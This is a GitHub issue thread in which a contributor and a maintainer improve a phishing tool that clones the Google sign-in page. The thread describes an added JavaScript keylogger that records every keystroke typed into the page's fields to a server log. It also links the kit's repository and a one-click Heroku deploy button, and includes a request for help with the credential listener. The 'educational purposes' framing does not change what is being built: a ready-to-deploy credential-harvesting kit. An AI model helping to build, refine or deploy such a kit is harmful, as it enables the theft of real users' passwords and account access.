### ISSUE TITLE
Updated Google Page for 2022

### ISSUE THREAD

**Issue by D4RKH0R1Z0N** [dmdhrumilmistry/GooglePhish#3]
Hey Man! I was trying to make a Phishing tool for educational purposes... So I made this page but I can seem to figure out the phising part here is a demo of the project you can modify it! and make update the tool! it would be great if you could! here are the files!

[google-login-page-clone.zip](https://github.com/dmdhrumilmistry/GooglePhish/files/8741068/google-login-page-clone.zip)

**Comment by dmdhrumilmistry** [comment]
@D4RKH0R1Z0N I can update this project with your website, can you fix this issues:

- Text Override: 

  ![Text Overridden](https://user-images.githubusercontent.com/56185972/169645426-795aee8d-7c67-4922-9a01-bc98630371b7.png)

**Comment by D4RKH0R1Z0N** [comment]
Oh ok I will fix it :)

**Comment by D4RKH0R1Z0N** [comment]
I have tried a v2 here is a preview should I do it like this? or continue like the orginal version?
![v3](https://user-images.githubusercontent.com/76612351/169661742-0723a158-51d2-4270-b298-09066b233e27.png)

**Comment by D4RKH0R1Z0N** [comment]
Its exactly like the google version and can verify if email exists!

Also I have made a js-keylogger I am planning to release it soon! anything in the input box typing/typed is keyloged even when the submit button is not pressed

**Comment by D4RKH0R1Z0N** [comment]
I have fixed the overriding issue of the text, now just have to do some css which I will do tomorrow, that all for today!

**Comment by dmdhrumilmistry** [comment]
Ohkay, no issues! I'll update the project ASAP.

**Comment by D4RKH0R1Z0N** [comment]
[google-login-page-clone.zip](https://github.com/dmdhrumilmistry/GooglePhish/files/8749135/google-login-page-clone.zip)
Fixed text override

**Comment by dmdhrumilmistry** [comment]
> 

![image](https://user-images.githubusercontent.com/56185972/169710736-0edf06d6-a381-4603-bb54-b24f2453e79b.png)
![image](https://user-images.githubusercontent.com/56185972/169710788-a8996254-a8b0-4efd-b683-fb467863747a.png)
I'm still facing the same issue

**Comment by D4RKH0R1Z0N** [comment]
[google-clone-v2.zip](https://github.com/dmdhrumilmistry/GooglePhish/files/8751878/google-clone-v2.zip)

**Comment by D4RKH0R1Z0N** [comment]
Ok working on it :)

**Comment by D4RKH0R1Z0N** [comment]
Fixed everything in password and email page!
[updated.zip](https://github.com/dmdhrumilmistry/GooglePhish/files/8759761/updated.zip)
Message if there is any mistakes!

**Comment by D4RKH0R1Z0N** [comment]
Check the update.zip if its ok then I will create a pull request

**Comment by D4RKH0R1Z0N** [comment]
Also pls wait I am going to devlop the keylog now I will submit it by today!

**Comment by dmdhrumilmistry** [comment]
> Also pls wait I am going to devlop the keylog now I will submit it by today!

great! I've already created another branch, you can pull request once, you're done!

**Comment by D4RKH0R1Z0N** [comment]
[v2-google-login-clone.zip](https://github.com/dmdhrumilmistry/GooglePhish/files/8761568/v2-google-login-clone.zip)

Wait I just made it with a keylogging, logs are saved at server/log.txt
Logs All keys, backspace, Control, space etc.

https://github.com/D4RKH0R1Z0N/gphish

**Comment by D4RKH0R1Z0N** [comment]
I know python but I don't know django yet 😓, you can click the deploy button on my [gphish](https://github.com/D4RKH0R1Z0N) repo...

<a href="https://heroku.com/deploy?template=https://github.com/D4RKH0R1Z0N/gphish">
  <img src="https://www.herokucdn.com/deploy/button.svg" alt="Deploy">
</a>

**Comment by D4RKH0R1Z0N** [comment]
Heres a preview

| Demo | Demo |
| ------------  | ------------ |
|![](https://gphish.herokuapp.com/images/demo1.png)|![](https://gphish.herokuapp.com/images/demo2.png)
| Demo | Demo |
|![](https://gphish.herokuapp.com/images/demo3.png)|![](https://gphish.herokuapp.com/images/demo5.png)

**Comment by D4RKH0R1Z0N** [comment]
[v2-google-login-clone.zip](https://github.com/dmdhrumilmistry/GooglePhish/files/8763260/v2-google-login-clone.zip)

Update for keylogger, Use this version

**Comment by dmdhrumilmistry** [comment]
looks good to me, should I take the source code from your gphish repo? I won't be able to update the repo till 31st, I'll try to update it ASAP. thanks for contributing to the project 😄

**Comment by D4RKH0R1Z0N** [comment]
I tested the .zip file it works on when hosted in heroku with php buildpack but doesn't work when you start it as localhost, so I will use <style> tag instead of link and put the script in the html file itself and not have external files, Sorry for the inconvenience you can fix it now just replace "server/" to "./"

**Comment by D4RKH0R1Z0N** [comment]
You can close this issue when I update the repo... I will be waitin till your repo is updated 😁😎

**Comment by D4RKH0R1Z0N** [comment]
Only one thing... I can make the updated version with django python or just leave it as it is...

**Comment by D4RKH0R1Z0N** [comment]
Hello can you help me with this problem?
```
"POST /static/Phisher/listener.php HTTP/1.1" 405 0
```

**Comment by D4RKH0R1Z0N** [comment]
I am having this one problem in django
```
"POST /static/Phisher/listener.php HTTP/1.1" 405 0
```
Do you know how to fix it?

**Comment by dmdhrumilmistry** [comment]
> > looks good to me, should I take the source code from your gphish repo? I won't be able to update the repo till 31st, I'll try to update it ASAP. thanks for contributing to the project 😄
> 
> You welcome!

Should I use the index file from [Gphish Repo](https://github.com/D4RKH0R1Z0N/gphish)?

**Comment by D4RKH0R1Z0N** [comment]
index.php? Yes

**Comment by dmdhrumilmistry** [comment]
The Google page is updated to latest one. You can verify and close issue now

**Comment by D4RKH0R1Z0N** [comment]
Oh ok!

**Comment by D4RKH0R1Z0N** [comment]
I know this might be selfish but can you add a like I don't know a shoutout? Like Made with D4RKH0R1Z0N? or somethin 😓
yeah I know it might be very selfish but just a credit...

**Comment by D4RKH0R1Z0N** [comment]
Can you merge this pull request? #5

**Comment by dmdhrumilmistry** [comment]
Done! 👍🏻
